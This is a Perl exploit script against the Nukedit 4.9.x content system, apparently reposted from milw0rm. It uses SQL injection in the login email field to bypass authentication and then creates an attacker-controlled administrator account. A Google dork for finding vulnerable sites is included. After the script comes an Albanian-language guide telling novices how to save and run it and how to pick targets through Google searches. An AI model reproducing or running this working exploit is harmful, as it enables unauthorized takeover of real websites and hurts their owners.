Nukedit 4.9.x Remote Create Admin Exploit

#!/usr/bin/perl############################################## ##############Title: Nukedit 4.9.x Create Admin Exploit ## ##Credit: r3dm0v3 ## http://r3dm0v3.persianblog.ir ## r3dm0v3[4t]yahoo[dot]com ## Tehran - Iran ## ##Download: http://www.nukedit.com/content/Download.asp ##Vulnerables: 4.9.x, prior versions maybe affected. ##Remote: Yes ##Dork: "Powered by Nukedit" ##Fix: Not Available ################################################## ##########use LWP::UserAgent;use HTTP::Cookies;$host = $ARGV[0];if (substr($host,length($host)-1,1) ne "/"){ $host.="/";}$usrmail = $ARGV[1];$passwd = $ARGV[2];$url = "http://".$host;$usrSQL= "' union select 1,1,'r3dm0v3',4,'ENCfc2aef9fe5f2c546429e2e1d9fd737 e6da5b1b94707518619576129a915d0c2c',6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20 from tblusers where 'x'='x";&Banner();if (@ARGV < 3) {&Usage();exit(1);}print "[~] Host: $host \n";print "[~] Email/Password: $usrmail/$passwd\n";print "[~] Logging in...\n";$xpl = LWP::UserAgent->new() || die;$cookie_jar = HTTP::Cookies->new();$xpl->cookie_jar( $cookie_jar );$res = $xpl->post($url.'utilities/login.asp',Content => ["redir" => "/nukedit/default.asp","email" => "$usrSQL","password" => "r3dm0v3","savepassword" => "false","submit" => "Login",],);if ($res->content =~ /Object Moved/){ print "[+] Logged in\n";}else{ print "[-] Can not login!\n"; exit();}print "[~] Creating Admin...\n";$res = $xpl->post($url.'utilities/useradmin.asp',Content => ["action" => "addDB","username" => "r3dm0v3","company" => "red move","url" => "http://r3dm0v3.persianblog.ir","address" => "a","county" => "b","zip" => "666","country" => "Iran","phone" => "66666666","fax" => "12345678","email" => "$usrmail","password" => "$passwd","groupid" => "1","submit1" => "Add User >>","IP" => "127.0.0.2",],);if ($res->content =~ /Object Moved/){ print "[+] Admin added. Login info:\n". " email: $usrmail\n". " password: $passwd\n";}else{ print "[-] Exploit failed!\n"; print $res->content;}sub Banner{print "################################################# ###########\n". "# Nukedit 4.9.x Create Admin Exploit #\n". "# by r3dm0v3 #\n". "# r3dm0v3[4t]yahoo[.]com #\n". "# http://r3dm0v3.persianblog.ir #\n". "################################################# ###########\n";}sub Usage(){print "\n Usage: nukedit.pl \n";print " ex. : nukedit.pl site.com/nukedit/ myname\@somewhere.com 123456\n";}# milw0rm.com [2008-02-26]




Per te Hapur Ket Exploit duhet te keni Prelin te Instaluar.
pra shum thjesht eshte se pari Exploitin qe eshte me nalt e beni copy dhe e qitni
ne Notepad dhe e beni sava as psh: hack.pl pra e ruani me nje
emer qe doni dhe me mbares .pl
pastaj e qitni ne C:/
dhe hym ne Start , Run, dhe CMD
dhe shkruajm kshtu: cd\ dhe enter
pastaj e shkruajm emrin e exploitit un e morra shembull hack.pl
dhe psh kshtu:hack.pl emriivebsajtit.com/ emalijot@hotmail.com 123456
dhe pastaj Enter
nqoft se kemi fat krijohet Admini dhe mund te Logiratesh dhe
pastaj eshte ne doren tendeSi te kerkosh ne Google.com:
dhe Pastaj merrni nje link dhe veproni si me nalt.